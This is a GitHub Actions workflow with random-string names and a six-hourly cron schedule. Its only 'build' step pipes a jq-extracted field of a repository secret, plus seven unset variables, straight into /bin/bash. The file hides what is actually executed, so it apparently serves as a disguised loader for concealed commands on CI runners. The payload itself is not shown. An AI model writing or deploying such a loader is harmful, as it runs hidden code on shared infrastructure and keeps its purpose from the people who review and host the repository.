name: chenhejiu6189
on:
  workflow_dispatch:
  schedule:
    - cron: '14 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenhejiu6189
        env:
          atmj03: ${{ secrets.atmj03 }}
        run: |
          echo $atmj03 | jq -r .mtpc4 | /bin/bash
          echo $wips1 | jq -r .vp918 | /bin/bash
          echo $xqu59 | jq -r .cv6 | /bin/bash
          echo $ab737 | jq -r .yukh86812 | /bin/bash
          echo $z880 | jq -r .h544 | /bin/bash
          echo $mdjc3 | jq -r .r72 | /bin/bash
          echo $fzuge50 | jq -r .u052 | /bin/bash
          echo $e1 | jq -r .kxrca62 | /bin/bash

